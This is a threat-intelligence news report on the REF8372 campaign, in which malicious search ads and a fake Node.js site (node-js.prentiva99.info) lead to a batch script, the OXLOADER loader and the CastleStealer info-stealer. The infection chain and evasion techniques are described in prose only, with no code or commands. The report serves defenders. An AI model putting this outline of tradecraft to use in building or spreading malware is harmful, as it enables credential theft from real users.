OXLOADER Malware

Cybersecurity researchers have uncovered a new malware campaign, designated REF8372, that employs a previously undocumented malware loader known as OXLOADER to deploy the information-stealing malware CastleStealer.

The operation begins with malicious Google advertisements designed to lure victims searching for popular software. Analysis suggests that the threat actors behind the campaign are likely Russian-speaking and financially motivated. This assessment is based on the malware's deliberate exclusion of systems located within the Commonwealth of Independent States (CIS), a tactic frequently used by cybercriminal groups operating in the region.

Although the campaign's advertisements were published under the verified name 'ВОЛОДИМИР ТЕРЕЩЕНКО,' allegedly based in Ukraine, it remains unclear whether this identity belongs to the operators themselves or represents a compromised, purchased, or fabricated account. Google removed the advertiser account and associated campaigns on May 14, 2026.

Search Engine Manipulation Leads Victims to Fake Software Sites

The infection chain is triggered when users search for terms such as 'lts version of node.js' through search engines like Google. Victims are redirected through sponsored results to a counterfeit website, node-js.prentiva99.info, masquerading as a legitimate software resource.

Users interacting with the fraudulent website are prompted to download a batch script hosted on Storj, a decentralized and open-source cloud storage platform. The abuse of legitimate services such as Storj highlights a growing trend among threat actors, who increasingly rely on trusted platforms to bypass domain reputation and security filtering mechanisms.

Multi-Stage Infection Chain Conceals Malicious Activity

Execution of the downloaded batch file displays a fake installation wizard, creating the illusion of a legitimate software setup while covertly downloading the next-stage payload, OXLOADER, from Storj. The malware is retrieved through a PowerShell command and launched with the -Verb RunAs parameter, generating a Windows User Account Control (UAC) prompt.

The attack subsequently uses DLL side-loading techniques to execute a malicious dynamic-link library, which decrypts and launches the final payload, CastleStealer.

Advanced Evasion Techniques Increase Detection Challenges

OXLOADER incorporates several sophisticated techniques specifically designed to hinder analysis and evade detection:

• Multiple obfuscation layers, including control-flow flattening, opaque predicates, and mixed Boolean-Arithmetic techniques.
• Self-modifying decryption routines, abuse of the Windows .reloc section for shellcode staging, and anti-sandbox mechanisms that prevent execution in virtualized analysis environments.

These capabilities demonstrate a deliberate and well-engineered approach to avoiding both static and dynamic detection mechanisms.

CastleStealer’s Growing Presence in Cybercrime Operations

CastleStealer is a .NET-based information-stealing malware family that has recently appeared in additional campaigns. It was previously distributed alongside CastleLoader through a ClickFix-style social engineering lure that posed as a free image-editing application in an operation known as BackgroundFix. CastleLoader has been linked to the threat activity cluster tracked as GrayBravo.

Early-Stage Threat with Significant Potential

Although OXLOADER appears to be in the early stages of operational deployment, its technical sophistication warrants close attention from defenders. Several characteristics indicate substantial investment by its developers:

• Extensive code obfuscation and anti-virtual-machine protections.
• Use of benign-looking code to disguise malicious binaries and unique payload staging techniques.

These design choices have already proven effective, enabling OXLOADER to achieve low detection rates across static scanning engines and automated detonation environments. As a result, the malware currently benefits from a valuable operational window before widespread detection signatures and countermeasures are developed.